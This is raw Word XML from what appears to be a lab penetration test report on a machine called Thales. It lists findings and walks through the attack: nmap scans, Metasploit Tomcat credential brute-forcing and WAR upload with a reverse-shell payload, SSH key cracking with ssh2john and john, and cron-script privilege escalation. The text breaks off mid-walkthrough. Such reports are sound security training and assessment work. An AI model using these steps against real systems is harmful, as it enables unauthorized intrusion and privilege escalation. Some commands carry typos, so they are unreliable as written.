        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcMar>
              <w:bottom w:w="0.0" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004F">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:color w:val="c00000"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Critical</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcMar>
              <w:bottom w:w="0.0" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000050">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:color w:val="ee0000"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">High</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:trHeight w:val="20" w:hRule="atLeast"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcMar>
              <w:bottom w:w="0.0" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000051">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcMar>
              <w:bottom w:w="0.0" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000052">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>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Below is a high-level overview of each finding identified during testing. These findings are covered in depth in the Technical Findings Details section of this report.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table3"/>
        <w:tblW w:w="9026.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3008"/>
        <w:gridCol w:w="3009"/>
        <w:gridCol w:w="3009"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="3008"/>
            <w:gridCol w:w="3009"/>
            <w:gridCol w:w="3009"/>
          </w:tblGrid>
        </w:tblGridChange>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:trHeight w:val="397" w:hRule="atLeast"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="c1e4f5" w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000055">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"># Findings</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="c1e4f5" w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000056">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Severity Level</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="c1e4f5" w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000057">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Finding Name</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:trHeight w:val="397" w:hRule="atLeast"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000058">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000059">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:color w:val="ee0000"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">High</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005A">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Apache Tomcat Manager Application Default/Weak Credential Authentication Bypass</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:trHeight w:val="397" w:hRule="atLeast"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005B">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005C">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="ee0000"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:color w:val="ee0000"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005D">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Information Disclosure via Improper Access Control ( SSH private key )</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:trHeight w:val="397" w:hRule="atLeast"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005E">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005F">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:color w:val="c00000"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Critical</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000060">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Local Privilege Escalation via World-Writable/User-Writable Root-Executed Cron Script</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>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rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.repb2cslr7by" w:id="7"/>
      <w:bookmarkEnd w:id="7"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Compromised System Walkthrough</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000064">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">During my testing of the assessment I was able to retrieve credentials for Tomcat’s service account using Metasploit. With it acquired, I proceeded with deploying a shell and found out that user name is thales and it has an easily accessible id_rsa private key for SSH. I cracked the hash revealing thales’s password and found in thales terminal a file named </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:color w:val="548dd4"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">notes.txt</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="548dd4"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">file, which contained information about </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:color w:val="548dd4"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">backup.sh</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="548dd4"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">file, a root-executable cron file that was readable and writable by normal users. With that in mind I delivered a payload via file injection and connected the reverse shell with netcat. Thanks to the root privileges on execution, I gained root access as well. Steps below demonstrate processes of information gathering / enumeration, exploitation, privilege escalation and post-exploitation.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000065">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.nakq7c13ah51" w:id="8"/>
      <w:bookmarkEnd w:id="8"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Detailed Walkthrough</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000066">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.jhrruodzx2mb" w:id="9"/>
      <w:bookmarkEnd w:id="9"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Enumeration / information gathering</w:t>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I used </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:color w:val="4f81bd"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">nmap -pn -n 192.168.239.0/24</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to check for IP addresses on my local interface and found </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:color w:val="4f81bd"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">192.168.239.8</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> which confirmed to be Thales’s IP address.</w:t>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I used </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:color w:val="4f81bd"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">nmap -sV -sC -n 192.168.239.7</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> for standard port scanning without reverse DNS and with basic scripts. This way I found that Thales runs OpenSSH on port 22 and Apache Tomcat </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">server</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> on port 8080.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000069">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.86400ebixt05" w:id="10"/>
      <w:bookmarkEnd w:id="10"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Exploitation</w:t>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ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.dzayt6kx5e5" w:id="11"/>
      <w:bookmarkEnd w:id="11"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Using the Metasploit</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Auxiliary module I found </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:color w:val="548dd4"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">scanner/http/tomcat_mgr_login</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="548dd4"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, which allowed me to </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">find the password</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> for default tomcat user ‘tomcat’ – role1.</w:t>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With credentials for Tomcat service account, I </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">used an exploit</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> named </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:color w:val="548dd4"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">multi/http/tomcat_mgr_upload</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> with proper settings, including </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:color w:val="548dd4"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">set PAYLOAD java/shell_reverse_tcp</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, that allowed me to deploy a simple shell on the target.</w:t>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Looking </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">at the folder</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> structure of </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:color w:val="548dd4"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/home/thales</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="548dd4"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">I found </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">that the username</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> is thales, but with Tomcat service account I lacked access to some of the files. However I </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">gained</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> access </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">to the</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:color w:val="548dd4"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.ssh</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="548dd4"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">directory </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">with the</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:color w:val="548dd4"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> id_rsa</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="548dd4"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">file, which was a private key for that user. I was able to read it and copy the information on my Kali Linux.</w:t>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With the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:color w:val="548dd4"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">thales_id_rsa</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="548dd4"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">file, I used </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:color w:val="548dd4"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ssh2john thales_id_rsa &gt; output.txt</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="548dd4"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">to format the SSH into breakable hash. Then with a command </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:color w:val="548dd4"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">john –wordlist-path output.txt </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
